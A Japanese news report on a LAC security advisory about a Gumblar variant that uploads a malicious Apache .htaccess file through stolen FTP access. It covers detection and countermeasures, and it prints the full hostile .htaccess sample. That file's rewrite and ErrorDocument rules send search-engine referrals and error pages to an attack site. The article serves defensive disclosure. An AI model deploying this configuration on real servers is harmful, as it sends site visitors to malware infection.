ラックは3日、Apacheの設定ファイルである「.htaccess」を不正にアップロードするGumblar亜種を確認、注意喚起をおこなった。

ラックによる注意喚起

同社によると確認したのは1日、FTP転送ログから少なくとも1月27日にはこの攻撃が発生していたという。動作概要として、主要検索サイトからのアクセス、および404、403などのエラー表示がApacheのリダイレクト機能で攻撃サイトに転送。ユーザーは、Gumblar同様に悪性プログラムの感染被害に遭遇する。

従来型Gumblarとの相違点としては、1.Firefox + NoScriptの組み合わせでは防げない可能性があり、RequestPolicyなどのリダイレクト対策、2.コンテンツファイル自体は改ざんされておらず、ブックマークやURLの直接入力では影響を受けないためWebサイト管理者が発見しにくい点、などを同社では挙げている。

また、対策として、Webサーバ管理者は、身に覚えのない.htaccessファイルが存在しないかの確認をすることを呼びかけている。同社では、確認されたログのサンプルとアップロードされる「.htaccess」ファイルのサンプルを公開している。サンプルは以下の通り。

確認されたログのサンプル

FTP
Wed Jan 27 07:20:20 2010 1 x.x.x.x 1278 /home/xxxx/.htaccess b _ i r xxxx ftp 0 * c

アップロードされる「.htaccess」ファイル

# HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://satelitdew.ru/ [R=301,L]

ErrorDocument 401 http://satelitdew.ru/
ErrorDocument 403 http://satelitdew.ru/
ErrorDocument 404 http://satelitdew.ru/
ErrorDocument 500 http://satelitdew.ru/
# /HostRule